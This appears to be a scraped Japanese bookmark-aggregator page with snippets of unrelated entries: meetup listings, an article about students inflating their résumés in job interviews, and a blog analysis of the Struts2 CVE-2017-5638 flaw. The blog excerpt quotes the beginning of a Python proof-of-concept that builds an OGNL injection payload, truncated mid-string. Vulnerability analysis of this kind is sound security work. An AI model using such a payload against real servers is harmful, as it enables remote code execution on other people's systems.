そーだいさんと飲む会@新宿 (2017/03/28 19:00〜)
注意 現在X(旧Twitter)でのソーシャルログインができない事象を確認しています。事前にX(旧Twitter)側で再ログインした上でconnpassのソーシャルログインを行うか、 「ユーザー名(またはメールアドレス)」と「パスワード」の組み合わせでのログインをお試しください。合わせてFAQもご確認ください。 お知らせ 2024年9月1日よりconnpassサービスサイトへのスクレイピングを禁止とし、利用規約に禁止事項として明記します。 9月1日以降のconnpassの情報取得につきましては イベントサーチAPI の利用をご検討ください。 お知らせ connpassではさらなる価値のあるデータを提供するため、イベントサーチAPIの提供方法の見直しを決定しました。2024年5月23日(木)より 「企業・法人」「コミュニティ及び個人」向けの2プランを提供開始いたします。ご利用にあたっては利用
第3回 Drupal 勉強会@DC (2017/03/29 19:30〜)
注意 現在X(旧Twitter)でのソーシャルログインができない事象を確認しています。事前にX(旧Twitter)側で再ログインした上でconnpassのソーシャルログインを行うか、 「ユーザー名(またはメールアドレス)」と「パスワード」の組み合わせでのログインをお試しください。合わせてFAQもご確認ください。 お知らせ 2024年9月1日よりconnpassサービスサイトへのスクレイピングを禁止とし、利用規約に禁止事項として明記します。 9月1日以降のconnpassの情報取得につきましては イベントサーチAPI の利用をご検討ください。 お知らせ connpassではさらなる価値のあるデータを提供するため、イベントサーチAPIの提供方法の見直しを決定しました。2024年5月23日(木)より 「企業・法人」「コミュニティ及び個人」向けの2プランを提供開始いたします。ご利用にあたっては利用
就職活動で話を平気で「盛る」学生の言い分
「嘘、いっぱいつきました」 満面の笑みで語るのは、国立大学の理系大学院を今春卒業し、大手メーカーに就職する男子学生。面接では、1年でやめたサークルやバイトを3年続けたことにして忍耐力をアピール。志望動機も「でっち上げ」で、すべての会社に同じものを出した。 有名私立大学からIT企業に就職する男子学生は、嘘エピソードを語り出すと止まらない。 「サークルで先輩の代がインカレのベスト4になったことを、あたかも自分たちの代のことのように話しました。どんなに頑張ったことでも、1回戦敗退じゃ説得力がないですから」 レッスンコーチのアルバイトでは人気がありすぎてクラスが増設されたことにしたし、授業でリポートを書いただけなのに、本格的な論文を書いて学園祭で発表したことにしたという。 実績盛りにキャラ変
Struts2のリモートコード実行可能脆弱性(CVE-2017-5638)を分析した - R42日記
またOGNL絡みの脆弱性が見つかりました。 アウトラインはid:Kango氏がまとめているこちらが参考になります。 http://d.hatena.ne.jp/Kango/20170307/1488907259 さて、この脆弱性の動作原理を調べてみました。 ファイルアップロード時のヘッダの処理方式に問題があるようです。 前述のURLで述べられているPoCはこんな感じ。 import requests import sys def poc(url): payload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
